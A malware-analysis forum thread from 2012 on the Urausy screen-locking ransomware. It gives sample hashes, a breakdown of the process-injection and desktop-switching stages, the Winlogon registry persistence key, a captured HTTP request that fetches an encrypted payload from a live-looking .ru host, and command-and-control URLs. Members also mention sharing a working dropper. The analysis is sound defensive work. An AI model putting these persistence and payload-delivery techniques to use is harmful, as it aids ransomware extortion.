Win32/Urausy (aka "WinLocker")

Forum for analysis and discussion about malware.

Win32/Urausy (aka "WinLocker")

Postby Win32:Virut » Fri Aug 17, 2012 10:27 am

Urausy

https://www.botnets.fr/index.php/Urausy

MD5: B88FD69B53A6E4587D9E95A0C6061141
You do not have the required permissions to view the files attached to this post.
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Trojan Ransom / FakePoliceAlert

Postby nullptr » Sun Sep 02, 2012 12:44 pm

Urausy

MD5: 74203CB3EE8722B8DE95CC2236C06F3E
vt - https://www.virustotal.com/file/59abd45 ... /analysis/
You do not have the required permissions to view the files attached to this post.
nullptr
 
Posts: 210
Joined: Sun Mar 14, 2010 6:35 am
Reputation point: 100

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Sun Sep 16, 2012 12:09 pm

5x Urausy
You do not have the required permissions to view the files attached to this post.
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

TrojanDownloader:Win32/Urausy.A

Postby Win32:Virut » Thu Oct 11, 2012 4:21 pm

Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Malware Requests, part 2

Postby rkhunter » Sat Oct 13, 2012 10:32 am

Win32:Virut wrote:Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks

SHA256: e19c8f1ea80d6cf9d3348a07c7428bbcdfc66ea5a192f63e22a8e29cfda5aaf0
SHA1: fae01f374d5dde3271306aca91f842f9f0b17d75
MD5: 0efd95e4d3502e20b7120685050abae2
File size: 44032 bytes
You do not have the required permissions to view the files attached to this post.
User avatar
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Sat Nov 17, 2012 3:44 pm

Urausy

Image
Click to enlarge
You do not have the required permissions to view the files attached to this post.
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Trojan Ransom / FakePoliceAlert

Postby rinn » Sat Nov 17, 2012 6:09 pm

Hi.

This is interesting ransom. It is written in fasm 1.7 and this make it something special. Usually ransomware are Delphi applications which are written by people with no programming skills. This one is different. It still simple compared to famous trojans, but there are some features which are making it special.

It has three stage startup.

On a first stage it registers window class "SetupFrameClass" creates window called "Setup" and waits few milliseconds. After wnd_procedure (see @004012D0) assumes control, it calls specially prepared code (see @004013A0) responsible for second stage and further trojan installation.

Second stage - memory inject in explorer.exe. After this code activates it is creating new special desktop named wLockDesktop, starting zombified copy of svchost.exe with injected (again) trojan code and initial process desktop value set to be wLockDesktop. Then execution transfers to this zombified svchost.exe


Third stage is responsible for setting autorun registry key

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell with value explorer.exe,%userprofile%\Application Data\msconfig.dat

<--- it is ransom itself (copy file routine also take place in this stage).

Ransom (code running inside svchost.exe) ensures that wLockDesktop is current active desktop by doing periodical switching to it. This was made to defeat sysinternals desktops and similar tools.

Decrypted and working dropper in attach. Password "infected" without quotes.

Best Regards,
-rin
You do not have the required permissions to view the files attached to this post.
rinn
 
Posts: 91
Joined: Thu Nov 15, 2012 6:14 am
Location: Japan
Reputation point: 67

Re: Trojan:Win32/Urausy (aka "WinLocker")

Postby EP_X0FF » Sun Nov 18, 2012 7:00 am

Switching to different desktop set in the infinite loop with a very small delay.

Code: Select all
00000039   273.98556519   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000040   274.08596802   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000041   274.18600464   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000042   274.28622437   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000043   274.38613892   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000044   274.48648071   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000045   274.59146118   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000046   274.68685913   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000047   274.78668213   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000048   274.90359497   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000049   275.01293945   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000050   275.10397339   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000051   275.20385742   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000052   275.32345581   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000053   275.43780518   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000054   275.52349854   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000055   275.62338257   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000056   275.72372437   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   


Winlock window hierarhy (diffent run, that why different PID).

Image

Used embedded IE window to display HTML based content.

Payload requested in encrypted container, special marker appended to the beginning of request string - "55565755".

GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1
User-Agent: Our_Agent
Host: hhrbn.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 18 Nov 2012 01:11:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Cache-Control: public
Content-Disposition: attachment; filename=32721
Content-Transfer-Encoding: binary
Content-Length: 83722


Decrypts into %temp% folder and then executes by ransom from embedded full screen IE window. Ransom page + all graphics/css in attach.
You do not have the required permissions to view the files attached to this post.
Ring0 - the source of inspiration
User avatar
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562

Re: Trojan:Win32/Urausy (aka "WinLocker")

Postby Xylitol » Sun Nov 18, 2012 10:43 am

EP_X0FF wrote:Host: hhrbn.ru

Not at home the weekend so can't attack/dissas stuff but found this
Code: Select all
rnmbe.su/hhrbn.ru
hxxp://46.37.162.28:80/user/login/ « auth service »
hxxp://hhrbn.ru:80/data.php
hxxp://hhrbn.ru:80/config.php
hxxp://hhrbn.ru:80/gateway.php
hxxp://hhrbn.ru:80/includes/rc4.php
hxxp://hhrbn.ru:80/includes/mysql.php
hxxp://hhrbn.ru:80/includes/functions.php
hxxp://hhrbn.ru:80/config/
hxxp://hhrbn.ru:80/cache/

mysql.php return "could not find driver" rest are standard HTTP 200/Length 0, probably need parameters.
User avatar
Xylitol
Global Moderator
 
Posts: 1634
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 491

Re: Trojan:Win32/Urausy (aka "WinLocker")

Postby Win32:Virut » Sun Nov 18, 2012 11:59 am

New Urausy
You do not have the required permissions to view the files attached to this post.
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Next

Return to Malware

Who is online

Users browsing this forum: No registered users and 9 guests